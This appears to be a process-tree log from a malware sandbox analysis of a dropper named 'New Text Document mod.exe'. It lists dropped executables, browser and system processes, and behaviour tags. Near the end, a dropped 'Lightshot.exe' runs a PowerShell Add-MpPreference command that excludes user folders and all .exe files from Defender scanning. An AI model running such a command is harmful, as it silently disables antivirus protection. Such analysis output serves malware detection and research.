        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1864,14551972147010537105,14665563564655892705,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\Desktop\a\TestResource\Launcher_Start.exe.WebView2\EBWebView" --webview-exe-name=Launcher_Start.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:2
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5060
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1864,14551972147010537105,14665563564655892705,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\Desktop\a\TestResource\Launcher_Start.exe.WebView2\EBWebView" --webview-exe-name=Launcher_Start.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=1960 /prefetch:3
        9⤵
        
        PID:9048
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1864,14551972147010537105,14665563564655892705,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\Desktop\a\TestResource\Launcher_Start.exe.WebView2\EBWebView" --webview-exe-name=Launcher_Start.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2452 /prefetch:8
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1632
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1864,14551972147010537105,14665563564655892705,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\Desktop\a\TestResource\Launcher_Start.exe.WebView2\EBWebView" --webview-exe-name=Launcher_Start.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3008 /prefetch:1
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6588
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,14551972147010537105,14665563564655892705,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\Desktop\a\TestResource\Launcher_Start.exe.WebView2\EBWebView" --webview-exe-name=Launcher_Start.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=3336 /prefetch:8
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6552
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1864,14551972147010537105,14665563564655892705,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\Desktop\a\TestResource\Launcher_Start.exe.WebView2\EBWebView" --webview-exe-name=Launcher_Start.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8048
  - - C:\Users\Admin\Desktop\New Text Document mod.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:3596
    - - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
        
        "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
        5⤵
        Executes dropped EXE
        
        PID:5740
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4844
      - C:\Users\Admin\Desktop\a\Kerish_Doctor_2017.exe
        
        "C:\Users\Admin\Desktop\a\Kerish_Doctor_2017.exe"
        6⤵
        
        PID:7524
        
        C:\Users\Admin\AppData\Local\Temp\is-B1F54.tmp\Kerish_Doctor_2017.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-B1F54.tmp\Kerish_Doctor_2017.tmp" /SL5="$D057C,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2017.exe"
        7⤵
        
        PID:6032
      - C:\Users\Admin\Desktop\a\mode11_0HVJ.exe
        
        "C:\Users\Admin\Desktop\a\mode11_0HVJ.exe"
        6⤵
        
        PID:7500
  - - C:\Users\Admin\Desktop\New Text Document mod.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2828
    - - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
        
        "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
        5⤵
        Executes dropped EXE
        
        PID:5540
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4884
      - C:\Users\Admin\Desktop\a\mode11_AKUh.exe
        
        "C:\Users\Admin\Desktop\a\mode11_AKUh.exe"
        6⤵
        
        PID:7808
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5308,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8
    3⤵
    PID:5700
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:5264
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:5820
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1936 -parentBuildID 20240401114208 -prefsHandle 1856 -prefMapHandle 1848 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0861217-32d8-4c57-9b79-c6d8346cef81} 5820 "\\.\pipe\gecko-crash-server-pipe.5820" gpu
      4⤵
      PID:6084
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20240401114208 -prefsHandle 2332 -prefMapHandle 2328 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da7775ea-a15e-4cb3-a648-a32c59f9e276} 5820 "\\.\pipe\gecko-crash-server-pipe.5820" socket
      4⤵
      PID:4996
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3248 -childID 1 -isForBrowser -prefsHandle 3240 -prefMapHandle 3236 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {156724e0-918f-4926-868e-cfcf3d07d21d} 5820 "\\.\pipe\gecko-crash-server-pipe.5820" tab
      4⤵
      PID:2084
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3896 -childID 2 -isForBrowser -prefsHandle 3888 -prefMapHandle 3884 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4cc91a4-87cb-4334-b053-ac59f4191c8b} 5820 "\\.\pipe\gecko-crash-server-pipe.5820" tab
      4⤵
      PID:5264
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4812 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4888 -prefMapHandle 4884 -prefsLen 32287 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {401902f3-eac3-4e81-bffb-d86cc2839d31} 5820 "\\.\pipe\gecko-crash-server-pipe.5820" utility
      4⤵
      Checks processor information in registry
      PID:6360
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5140 -childID 3 -isForBrowser -prefsHandle 5132 -prefMapHandle 3828 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6e47c06-6924-42fb-836b-476aa4040a6c} 5820 "\\.\pipe\gecko-crash-server-pipe.5820" tab
      4⤵
      PID:7116
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5272 -childID 4 -isForBrowser -prefsHandle 5280 -prefMapHandle 5284 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1251b9e0-b297-4a51-af5c-8f66c342bfcf} 5820 "\\.\pipe\gecko-crash-server-pipe.5820" tab
      4⤵
      PID:7132
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5464 -childID 5 -isForBrowser -prefsHandle 5472 -prefMapHandle 5476 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {67860748-5ba1-4056-afea-f515119684e0} 5820 "\\.\pipe\gecko-crash-server-pipe.5820" tab
      4⤵
      PID:7144
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5504 -childID 6 -isForBrowser -prefsHandle 6048 -prefMapHandle 6032 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {540fc787-3026-4cc3-969e-4b19be0fdca5} 5820 "\\.\pipe\gecko-crash-server-pipe.5820" tab
      4⤵
      PID:7052
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6260 -childID 7 -isForBrowser -prefsHandle 6576 -prefMapHandle 6572 -prefsLen 27228 -prefMapSize 244658 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44c4a0ab-0e43-4a4b-b97f-90523eed7b41} 5820 "\\.\pipe\gecko-crash-server-pipe.5820" tab
      4⤵
      PID:6996
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4408 -parentBuildID 20240401114208 -prefsHandle 4416 -prefMapHandle 3556 -prefsLen 32418 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {32a1f830-453b-4bee-874e-5e217776fc0c} 5820 "\\.\pipe\gecko-crash-server-pipe.5820" rdd
      4⤵
      PID:7128
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2876 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 3056 -prefMapHandle 3100 -prefsLen 32418 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8ecc24cf-8a31-4c1d-b65e-583f55bfef9b} 5820 "\\.\pipe\gecko-crash-server-pipe.5820" utility
      4⤵
      Checks processor information in registry
      PID:7124
  - - C:\Users\Admin\Desktop\New Text Document mod.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exe"
      4⤵
      PID:6784
    - - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
        
        "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
        5⤵
        
        PID:6960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  PID:1240
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8d538cc40,0x7ff8d538cc4c,0x7ff8d538cc58
    3⤵
    PID:6652
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1796,i,18131640102685731735,1976766937892605986,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=1788 /prefetch:2
    3⤵
    PID:6152
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,18131640102685731735,1976766937892605986,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2064 /prefetch:3
    3⤵
    PID:6512
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,18131640102685731735,1976766937892605986,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2116 /prefetch:8
    3⤵
    PID:4564
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,18131640102685731735,1976766937892605986,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3164 /prefetch:1
    3⤵
    PID:2924
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3328,i,18131640102685731735,1976766937892605986,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3336 /prefetch:1
    3⤵
    PID:1716
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3584,i,18131640102685731735,1976766937892605986,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3596 /prefetch:1
    3⤵
    PID:6836
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4776,i,18131640102685731735,1976766937892605986,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4792 /prefetch:8
    3⤵
    PID:6464
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4400,i,18131640102685731735,1976766937892605986,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4888 /prefetch:8
    3⤵
    PID:3112
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3524,i,18131640102685731735,1976766937892605986,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4804 /prefetch:1
    3⤵
    PID:1580
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5060,i,18131640102685731735,1976766937892605986,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=5068 /prefetch:8
    3⤵
    PID:2404
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4056,i,18131640102685731735,1976766937892605986,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4636 /prefetch:8
    3⤵
    PID:1516
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3280,i,18131640102685731735,1976766937892605986,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3224 /prefetch:8
    3⤵
    PID:6004
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  PID:5716
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    PID:5276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3472

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3860

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3996

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4008

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:556

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:4860

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1668

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:4552

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4436

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:3136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:3036
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1412 -ip 1412
  2⤵
  PID:3712

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2932

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:8

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:996

C:\ProgramData\Screenshots\Lightshot.exe
C:\ProgramData\Screenshots\Lightshot.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5540
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
